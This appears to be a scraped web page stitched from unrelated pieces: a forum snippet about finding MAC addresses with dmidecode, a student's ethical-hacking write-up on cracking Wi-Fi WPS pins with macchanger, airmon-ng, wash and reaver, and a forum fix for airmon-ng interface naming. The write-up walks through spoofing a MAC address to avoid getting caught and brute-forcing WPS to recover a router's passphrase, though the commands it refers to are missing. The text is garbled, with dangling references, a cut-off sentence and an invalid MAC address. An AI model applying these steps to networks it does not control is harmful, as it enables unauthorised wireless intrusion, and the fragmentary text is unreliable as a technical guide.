root@server # dmidecode grep -i mac MCE (Machine check exception) MCA (Machine check architecture) HP BIOS NIC PCI and MAC Information NIC 1: PCI device 03:00.0, MAC address 1C:69:F5:4B:24:Y8 NIC 2: PCI device 03:00.1, MAC address 1C:69:F5:4B:24:Y8 HP BIOS iSCSI NIC PCI and MAC Information. Sadly, I can't remember what the command is the find the previous entry, but. Hope this helps, and if you need to find the previous entry, I hope this inspires you enough to google and figure it out! Edit: THANKS ALL! There is some GREAT info in the comments; I really appreciate everyone's contribution, and I'm learning even more.
Disclaimer: This is for educational and personal use only. This was originally done as an assignment for SEC701 – Ethical Hacking. I do not condone potential illegal uses of this information. However it is perfectly legal to “hack” your own equipment or equipment you’re authorized to administer. If you use this for malicious purposes, it is not my fault.
Background
WPS is a security standard that allows users to connect to WPA/WPA2 networks easier, through use of an 8 digit pin code. As a result this actually weakens the security of WPA/WPA2 as this can be brute forced, and once compromised allows the hacker the ability to access the router/access point and have it provide it’s own passphrase or PSK (pre-shared key). The tools used in this attack are as follows, all included in Kali linux.
macchanger (for MAC spoofing, not directly connected to the attack)
airmon-ng
wash
reaver
The video used as a basis for this attack (and shown for demonstration in class) can be found here:
Part 1 – MAC Spoofing
While not essential to our hack, in order to simulate doing this for real we’re going to spoof our MAC Address to limit the potential for getting caught. To do this requires only a few steps. For demonstration purposes, show the current MAC address:
The first thing we do is bring the interface down and stop network manager, by issuing the following commands:
Now we generate a random MAC address using macchanger. There are a couple of different options here, either using -r which will generate a random MAC or -a which will generate a random MAC with the same manufacturer prefix (if it can determine the manufacturer). In my case, it couldn’t so the output is the same as using -r.
Finally bring the interface up, and note the MAC has changed (the previous step actually shows you the original MAC and the new MAC).
Part 2 – Hacking WPS
Hacking WPS was actually less work than hacking WEP, though it took a lot longer. The first thing we need to do is run airmon-ng without options to ensure our wireless interface is being detected properly.
Next issue the command again with the interface included to start monitoring.
Issue the wash command to scan for access points in the area.
The output should look something like the following.
Now we’re going to run reaver with the MAC address of the access point as an argument, which was obtained as a result of the command used in the previous step. This step can take anywhere from 4 to 20+ hours. In my case it took about 6 hours to successfully crack the WPS pin.
Once you have the pin, run reaver again providing it the pin as an argument and it will return the PSK fairly quickly.
Which resulted in the following output.
Conclusions
The attack method used to compromise WPA/WPA2 by way of hacking the WPS was in my opinion much easier than that used to hack WEP in a previous demonstration this semester. While WEP took about 30 minutes to crack, hacking WPS took approximately 6 hours. After some very brief research online I discovered that this process can take anywhere from 4 to 30 hours. You would think the length of time required to perform the hack would be somewhat of a deterrent, however once WPS has been compromised it opens up a permanent vulnerability (unless one disables WPS) as the same key can be used to repeat the process once the Administrator for the access point changes the pre-shared key. To further complicate matters the WPS key is hard coded for each router, and cannot be changed. Which leads us to another problem. Some access points don’t actually disable WPS even when you’ve disabled the ability in the device’s settings. This has been patched by many of the leading manufacturers, but it is up to the Administrator responsible for the access point to see if this is in fact an issue for their particular hardware.
The original problem description and solution can be found in this forum thread.
Failed To Retrieve A Mac Address For Interface 'mon0' Reaver
Problem:Every time the command “airmon-ng start wifi0 x” is run, a new interface is created as it should, but there where two problems. The first is that for each time airmon-ng is run on wifi0 the interface number on ath increases: the first time is ath1, the second ath2, the third ath3, and and so on. And this continues so in a short period of time it is up to ath56 and continuing to climb. Unloading the madwifi-ng driver, or rebooting the system has no effect, and the number of the interface created by airmon-ng continues to increase.
The second problem is that if you run airmon-ng on wifi0 the athXX created does not show as being shown as in Monitor mode, even though it is. This can be confirmed via iwconfig.
All these problem related to how udev assigns interface names. The answer is in this ticket: http://madwifi-project.org/ticket/972#comment:12 Thanks to lucida. The source of the problem comes from the udev persistent net rules generator.
Each distro is different… So here is a solution specifically for Gentoo. You should be able to adapt this solution to your particular distribution.